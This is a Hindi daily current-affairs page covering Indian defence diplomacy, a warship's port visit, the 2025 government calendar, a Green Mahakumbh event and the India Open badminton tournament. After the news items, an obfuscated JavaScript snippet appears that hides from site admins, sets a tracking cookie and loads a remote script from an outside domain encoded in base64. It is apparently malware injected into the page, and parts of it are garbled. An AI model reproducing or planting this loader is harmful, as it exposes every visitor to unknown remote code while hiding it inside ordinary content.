8 जनवरी करेंट अफेयर्स

1. भारत और मालदीव के रक्षा मंत्री की मुलाकात — 8 से 10 जनवरी तक तीन दिवसीय भारत दौरे पर आए मालदीव के रक्षा मंत्री मोहम्मद घासन मौमून रक्षा मंत्री राजनाथ सिंह से मिले । इस दौरान मालदीव की सेना को हथियार और डिफेंस उपकरण देने, संयुक्त सैन्य युद्धाभ्यास और डिफेंस प्रोजेक्ट्स जैसे मुद्दों पर चर्चा हुई।

2. नये युद्धपोत INS तुशील का पोर्ट विजिट — 7 जनवरी को भारत का सबसे नए गाइडेड मिसाइल युद्धपोत INS तुशील का पहली बार पोर्ट विजिट हुआ। . INS तुशील सेनेगल के डकार बंदरगाह पहुंचा जहां पर 150 भारतीयों ने इसका स्वागत किया और एक संयुक्त योगाभ्यास सत्र का भी आयोजन किया गया। .INS तुशील ने सेनेगल की नेवी के जहाज PHM नियानी के साथ मिलकर एक एक्सरसाइज भी की ।

3. 2025 का भारत सरकार कैलेंडर जारी — केन्द्रीय सूचना और प्रसारण मंत्री अश्विनी वैष्णव ने 7 जनवरी को भारत सरकार का वर्ष 2025 का कैलेंडर जारी किया। इसकी थीम ‘ जनभागीदारी से जनकल्याण ‘ रखी गई है , कैलेंडर के मोटो ‘ सर्वेषां मंगलं भूयात् ‘ यानी सभी का कल्याण हो कैलेंडर के प्रथम पृष्ठ पर लिखा गया है यह 13 भाषाओं में प्रकाशित किया गया है।

4. 31 जनवरी को ग्रीन महाकुंभ का होगा आयोजन – प्रयागराज में कुंभ पर्व के दौरान 31 जनवरी को ग्रीन महाकुंभ का आयोजन होगा जिसमें प्रकृति , पर्यावरण , पानी और सफाई जैसे विषयों पर राष्ट्रीय स्तर की बैठक होगी इसमें पर्यावरण और जल संरक्षण करने वाले कार्यकर्ता शामिल होंगे। इसका आयोजन शिक्षा संस्कृति उत्थान न्यास द्वारा किया जायेगा और उत्तरप्रदेश के मुख्यमंत्री योगी आदित्यनाथ इसके मुख्य संरक्षक होंगे।

5. इंडिया ओपन बैडमिंटन टूर्नामेंट 14 जनवरी से – 14 जनवरी से नई दिल्ली में इंदिरा गांधी स्टेडियम में इंडिया ओपन 750 बैडमिंटन टूर्नामेंट का आयोजन होने जा रहा है लक्ष्य सैन और पीवी सिंधु भारतीय दल की अगुवाई करेंगे , 20 खिलाड़ियों का दल इस टूर्नामेंट में हिस्सा लेगा। ओलिंपिक चैंपियन विक्टर एक्सेलसन , एन से यंग व दुनिया के नंबर एक खिलाड़ी शि यूकी जैसे खिलाड़ी भी इस टूर्नामेंट में हिस्सा लेंगे। चिराग शेट्टी और सात्विक साईराज रंकीरेड्डी मेंस डबल्स में भारतीय टीम की अगुवाई करेंगे ।

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply